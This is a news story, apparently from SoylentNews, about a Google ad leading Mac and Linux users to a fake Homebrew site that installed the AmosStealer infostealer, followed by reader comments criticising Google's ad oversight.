Arthur T Knackerbracket has processed the following story:
Leveraging an attack vector that's been in play off and on for the last two decades, hackers are targeting Mac users with malware camouflaged as the popular Homebrew tool, and spreading it through deceptive Google ads.
Malicious actors are leveraging Google ads to distribute malware through a counterfeit Homebrew website. The campaign targets macOS and Linux users with an infostealer that compromises credentials, browser data, and cryptocurrency wallets.
Homebrew, a widely-used open-source package manager, enables users to manage software through a command line. Hackers recently exploited its popularity by creating a malicious Google ad.
The ad, spotted by developer Ryan Chenkie, appeared legitimate, displaying the correct URL for the Homebrew website, "brew.sh." However, users who clicked it were redirected to a fake website hosted at "brewe.sh."
The fake site mimicked Homebrew's installation process, tricking visitors into running a malicious command. While the legitimate Homebrew site also provides such installation commands, running the script from the fake site downloaded and executed malware, specifically AmosStealer.
AmosStealer, also known as "Atomic Stealer," is a macOS-focused infostealer sold to cybercriminals for $1,000 per month. It targets over 50 cryptocurrency wallets, browser-stored data, and desktop apps.
Previously, this malware has been used in similar campaigns, including fake Google Meet pages, making it a go-to tool for Apple-focused cyberattacks.
Homebrew's project leader, Mike McQuaid, expressed frustration with Google's inability to prevent such scams. While the malicious ad was taken down, McQuaid highlighted that similar incidents continue to occur due to insufficient oversight of sponsored ads.
Cybersecurity experts recommend avoiding sponsored links when searching for popular tools. Bookmarking official websites or accessing them directly can help users minimize risk.
[...] To stay safe from these types of attacks, make sure to double-check website URLs before clicking, stick to bookmarks for trusted sites, and steer clear of installing software from unfamiliar or sponsored links.
Google has taken down this one particular malicious ad. As history has proven, the danger from bad ads isn't gone, so Mac users — especially those using Homebrew — need to stay alert.
(Score: 0) by Anonymous Coward on Sunday February 02, @05:29AM (2 children)
Huh, can't Google even automate banning/blocking of such stuff? I can understand not being able to block it if it goes to a url shortener or the scam site directly (which might show innocuous stuff mostly except for targets).
Maybe Google sacked the developer who was doing such stuff? 😉
(Score: 4, Insightful) by Mykl on Sunday February 02, @09:59PM (1 child)
Here, "inability" should be read as "unwillingness to put in the effort required"
(Score: 2) by Ox0000 on Monday February 03, @06:07PM
But but... that costs money!
(Score: 2) by jman on Monday February 03, @05:13PM
This is wty one learns to compile code. Sure, if you get the source from a dodgy repo, you can still be in trouble, but so far openssl, curl, bash, etc. are all secure sites, and hopefully will remain that way.